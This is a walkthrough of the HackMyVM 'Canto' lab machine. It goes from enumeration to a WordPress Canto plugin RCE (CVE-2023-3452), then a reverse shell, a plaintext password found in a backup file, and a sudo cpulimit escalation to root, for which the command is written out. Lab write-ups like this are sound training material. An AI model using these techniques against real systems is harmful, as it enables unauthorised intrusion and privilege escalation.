“Enjoy it!! ;)” HackMyVM machine containing WordPress plugin abuse, credential stealing, and SUID privesc to root.
This machine can be downloaded from HackMyVM. You don’t need to create an account, you only need an account to submit the user/root flags and access the rest of the platform.
To set up this machine inside Proxmox, I used the following resource as a reference: https://benheater.com/proxmox-lab-adding-vulnhub-vms/. Additionally, I had to fix some DHCP issues when booting the machine using the following resource: https://benheater.com/proxmox-lab-adding-hackmyvm-boxes/.
Finally, I set up a simple DHCP server to assign an IP address from my Kali machine to the vulnerable VM. Here’s my own guide on how to configured it based on a previous writeup for the Kioptrix series: Kioptrix Level 2 (1.1) - VulnHub Writeup
Enumeration
Let's get started by finding the IP address of our vulnerable machine with arpscan.
└─$ sudo arp-scan --interface=eth2 -l
Interface: eth2, type: EN10MB, MAC: bc:24:11:b4:13:a7, IPv4: 10.0.1.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.1.117 bc:24:11:88:8c:de (Unknown)
1 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.024 seconds (126.48 hosts/sec). 1 respondedGreat, now let's continue with our usual nmap enumeration.
└─$ nmap 10.0.1.117 -T4 -p- -oN all-ports
Starting Nmap 7.95 ( https://nmap.org ) at 2026-08-08 17:20 MDT
Nmap scan report for 10.0.1.117
Host is up (0.000091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: BC:24:11:88:8C:DE (Proxmox Server Solutions GmbH)
Nmap done: 1 IP address (1 host up) scanned in 1.13 secondsBy opening the website, we will be met with an empty-looking homepage.
None of the links appear to work. Continuing with whatweb, we will see that this website is hosted on WordPress 6.5.3.
└─$ whatweb http://10.0.1.117
http://10.0.1.117 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[10.0.1.117], MetaGenerator[WordPress 6.5.3], Script[importmap,module], Title[Canto], UncommonHeaders[link], WordPress[6.5.3]A directory scan for / also confirms that this is a WordPress website.
Additionally, we can find a single post inside /index.php/2024/05/12/hello-world/ by checking the feed. This post only contains the name of the author : erik. This username might be useful later.
WordPress enumeration → plugin abuse
Let's use wpscan to enumerate this WordPress website deeper. Using the -e ap options to enumerate all plugins with an aggresive detection mode (--plugins-detection aggressive) might return more information about the plugins of the website.
└─$ wpscan --url http://10.0.1.117/ -e ap --plugins-detection aggressiveUsing the aggressive option with make wpscan sends hundreds of thousands of requests to find all plugins, so be careful with this option. These were the plugins that were found by wpscan.
Since this machine is called canto, we should try to abuse the canto plugin. The version of this plugin is 3.0.4, which makes it vulnerable to CVE-2023-3452!
Using a public exploit from Exploit-DB, we should be able to get RCE on the machine. Let's test if that exploit works.
Great! Let's get a reverse shell using PentestMonkey's reverse shell.
Lateral Movement: www-data -> erik
During our WordPress enumeration, we discovered the erik username. Now, let's navigate to the home directory belonging to this user to see if we can read the user.txt flag.
$ ls -l /home/erik
total 8
drwxrwxr-x 2 erik erik 4096 May 12 2024 notes
-rw-r----- 1 root erik 33 May 12 2024 user.txtWe can't read the flag as www-data, so we should escalate to the erik account. Looking inside the notes folder, we can see some world-readable files that point to a useful piece of information.
$ ls -l /home/erik/notes
total 8
-rw-rw-r-- 1 erik erik 68 May 12 2024 Day1.txt
-rw-rw-r-- 1 erik erik 71 May 12 2024 Day2.txt
$ cat /home/erik/notes/*
On the first day I have updated some plugins and the website theme.
I almost lost the database with my user so I created a backups folder.Let's look for this backups folder using find.
The directory inside /var/wordpress looks promising, let's see what's inside.
$ cd /var/wordpress/backups
$ ls -la
total 12
drwxr-xr-x 2 root root 4096 May 12 2024 .
drwxr-xr-x 3 root root 4096 May 12 2024 ..
-rw-r--r-- 1 root root 185 May 12 2024 12052024.txt
$ cat 12052024.txt
------------------------------------
| Users | Password |
------------|----------------------|
| erik | th1sIsTheP3ssw0rd! |
------------------------------------Great, a user password! Let's attempt to ssh as the erik user.
Now, we can submit the user.txt flag.
Privilege Escalation: erik -> root
The final privilege escalation here was quite simple. Starting with sudo -l, we can observe that the erik user has sudo permissions to run cpulimit.
erik@canto:~$ sudo -l
Matching Defaults entries for erik on canto:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimitAfter some research, I discovered a payload to get a shell as the root user, which allowed me to quickly escalate privileges to compromise the machine.
erik@canto:~$ sudo cpulimit -l 100 -f -- /bin/sh
Process 1480 detected
# id
uid=0(root) gid=0(root) groups=0(root)The root flag will be available in the /root directory.
This machine was great for learning about further WordPress enumeration and plugin abuse!